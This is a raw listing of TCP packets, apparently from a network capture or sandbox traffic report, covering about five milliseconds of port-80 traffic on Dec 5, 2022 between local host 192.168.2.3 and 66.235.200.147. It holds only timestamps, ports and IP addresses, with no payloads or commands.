Dec 5, 2022 01:32:37.927525043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927541018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927544117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927560091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927567005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927586079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927593946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927608013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927622080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927643061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927648067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927660942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927674055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927687883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927701950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927715063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927728891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927742004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927756071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927767038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927783966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927795887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927812099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927830935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927839041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927850962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927865982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927876949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927892923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927918911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927925110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927946091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927951097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927967072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927973032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927983999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928000927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928023100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928025961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928051949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928061962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928061962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928078890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928106070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928106070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928133011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928136110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928160906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928174019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928186893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928198099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928198099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928212881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928222895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928241014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928252935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928267002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928287983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928293943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928319931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928342104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928345919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928359985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928374052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928400040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928401947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928420067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928428888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928435087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928455114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928476095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928481102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928494930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928507090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928528070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928533077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928546906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928560972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928587914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928611994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928606033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928634882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928638935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928664923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928666115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928683043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928692102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928704023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928719997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928735971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928746939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928759098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928775072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928802013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928824902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928827047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928842068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928855896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928869009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928881884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928908110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928908110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928930998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928937912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928953886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.928963900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.928989887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929008961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929017067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929034948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929045916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929059982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929071903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929100990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929117918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929126024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929147005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929152966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929168940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929181099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929203033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929207087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929220915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929234982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929255009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929259062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929286003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929308891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929308891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929311037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929328918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929339886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929363012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929364920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929384947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929392099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929409027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929419994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929430962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929447889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929472923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929493904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929498911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929512978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929527044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929542065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929553986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929559946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929579973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929595947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929606915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929625034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929634094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929641962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929661989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929675102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929688931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929702997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929714918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929723978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929743052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929755926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929768085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929786921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929795027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929807901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929831982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929848909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929857969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929873943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929884911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929893970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929912090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929924011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929938078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929954052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929965019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.929974079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.929992914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930002928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930020094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930039883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930046082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930069923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930073023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930083036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930102110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930126905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930147886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930152893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930176020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930179119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930206060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930214882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930214882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930233002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930252075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930259943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930282116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930285931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930308104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930314064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930340052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930356979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930366039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930388927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930392027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930406094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930418968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930434942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930444956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930461884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930470943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930484056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930497885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930511951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930525064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930535078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930550098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930563927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930577040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930593014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930603027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930618048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930629969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930640936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930658102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930668116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930684090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930696964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930711031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930722952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930737972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930753946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930763006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930772066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930790901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930802107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930819035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930831909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930845022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930860996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930872917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930892944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930911064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930927992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930937052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930944920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930963993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.930974960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.930993080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931005955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931019068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931030989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931046009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931058884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931072950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931087971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931101084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931112051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931128025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931135893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931154966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931169987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931181908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931194067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931210995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931217909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931236982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931258917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931262970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931273937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931291103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931303024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931317091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931333065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931344032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931358099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931370020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931380987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931395054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931416035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931422949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931430101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931448936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931461096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931476116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931488991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931502104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931516886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931528091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931540966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931555986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931570053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931581974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931597948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931607962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931615114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931636095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931648970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931663036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931677103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931691885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931705952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931718111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931734085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931751013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931766033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931777954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931788921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931804895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931821108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931830883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931843996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931858063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931871891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931884050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931899071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931910992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931927919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931938887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931952000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931965113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.931977034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.931992054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932002068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932019949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932034016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932046890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932060957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932074070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932091951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932101965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932111025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932128906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932143927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932156086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932171106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932180882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932193995 CET	49705	80	192.168.2.3	66.235.200.147
